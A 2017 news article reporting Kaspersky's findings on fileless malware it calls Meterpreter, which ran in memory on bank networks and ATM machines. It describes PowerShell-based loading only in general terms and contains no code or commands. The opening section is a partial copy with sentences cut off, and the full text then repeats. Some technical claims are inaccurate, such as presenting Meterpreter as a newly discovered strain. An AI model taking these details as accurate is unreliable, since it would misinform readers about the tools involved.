By By James Walker Feb 8, 2017 in Technology A dangerous strain of malware is going mainstream and targeting banks around the world, security researchers have warned today. Attackers have created malware that doesn't store any files, making it virtually undetectable. Undetectable malware Fileless malware is stored entirely in a computer's working memory. Because it doesn’t use the filesystem, it's virtually undetectable. It can run for months without anyone noticing, injecting itself into RAM and remaining active until the computer's shutdown. While highly successful, the complexities of the approach have so far prevented it seeing significant use. However, the technique is now becoming more mainstream, security researchers from Hijacking system tools Meterpreter goes the extra mile in covering its tracks. It injects itself into the target's memory by using genuine system administration tools. Kaspersky discovered it frequently uses malicious Windows PowerShell scripts to hijack machines. The scripts assign memory to Meterpreter and then download the malware straight into RAM. Kaspersky only discovered Meterpreter in late 2016. It was contacted by a bank after its security team found Meterpreter actively running inside Windows' domain controller, a legitimate part of the operating system. Kaspersky stepped in to complete a forensic investigation, ascertaining that the program was completely fileless. The company successfully restored a copy of the utility from memory by analysing error dumps from the infected machines. It determined the contents of the malicious PowerShell scripts too, enabling it to piece together how the attack runs to completion. It's still unclear how the PowerShell scripts were delivered to the machines. Fileless malware heads to the wild Meterpreter is concerning because it's the first time fileless malware has been used to successfully orchestra large-scale cyberattacks on major organisations. The hackers behind the malware were using it to force money out of banks, installing the Less than two years ago, security firm "Techniques like those described in this report are becoming more common, especially against relevant targets in the banking industry," the company Consumer impact Fileless malware is less likely to be such a significant concern on desktop PCs. RAM is volatile storage so its contents are deleted each time you reboot. Because PCs are typically rebooted on a daily basis, fileless attacks are less likely to be a success when targeting home users. However, servers running corporate networks are designed for continuous operation, rebooting only if a fault is encountered. The malware can expect to persist in RAM indefinitely, safe in the knowledge it's almost completely invisible to the outside world. These attacks are therefore likely to concentrate on enterprise systems for the foreseeable future. Fileless invasions of always-on mobile devices and IoT products are also a possibility. Usually, malware is loaded from a computer's hard drive when it starts up. Security software can provide protection by periodically scanning connected drives for previously identified threats. Researchers can begin more detailed investigations by looking for suspect files.Fileless malware is stored entirely in a computer's working memory. Because it doesn’t use the filesystem, it's virtually undetectable. It can run for months without anyone noticing, injecting itself into RAM and remaining active until the computer's shutdown.While highly successful, the complexities of the approach have so far prevented it seeing significant use. However, the technique is now becoming more mainstream, security researchers from Kaspersky Labs reported today. The company has found a form of fileless malware called Meterpreter in 140 networks across 40 countries. The affected systems are predominantly owned by banks and enterprises.Meterpreter goes the extra mile in covering its tracks. It injects itself into the target's memory by using genuine system administration tools. Kaspersky discovered it frequently uses malicious Windows PowerShell scripts to hijack machines. The scripts assign memory to Meterpreter and then download the malware straight into RAM.Kaspersky only discovered Meterpreter in late 2016. It was contacted by a bank after its security team found Meterpreter actively running inside Windows' domain controller, a legitimate part of the operating system. Kaspersky stepped in to complete a forensic investigation, ascertaining that the program was completely fileless.The company successfully restored a copy of the utility from memory by analysing error dumps from the infected machines. It determined the contents of the malicious PowerShell scripts too, enabling it to piece together how the attack runs to completion. It's still unclear how the PowerShell scripts were delivered to the machines.Meterpreter is concerning because it's the first time fileless malware has been used to successfully orchestra large-scale cyberattacks on major organisations. The hackers behind the malware were using it to force money out of banks, installing the malware on computers operating automatic teller machines.Less than two years ago, security firm Trend Micro reported that fileless malware had been spotted in the wild for the first time. It warned that more malware creators would be adopting the technique soon. According to Kaspersky, that's now very much the case. It said incidents of fileless attacks are rising as the technique becomes more widespread."Techniques like those described in this report are becoming more common, especially against relevant targets in the banking industry," the company said . "Unfortunately the use of common tools combined with different tricks makes detection very hard. In fact, detection of this attack would be possible in RAM, network and registry only."Fileless malware is less likely to be such a significant concern on desktop PCs. RAM is volatile storage so its contents are deleted each time you reboot. Because PCs are typically rebooted on a daily basis, fileless attacks are less likely to be a success when targeting home users.However, servers running corporate networks are designed for continuous operation, rebooting only if a fault is encountered. The malware can expect to persist in RAM indefinitely, safe in the knowledge it's almost completely invisible to the outside world. These attacks are therefore likely to concentrate on enterprise systems for the foreseeable future. Fileless invasions of always-on mobile devices and IoT products are also a possibility. More about Malware, Cybersecurity, fileless malware Malware Cybersecurity fileless malware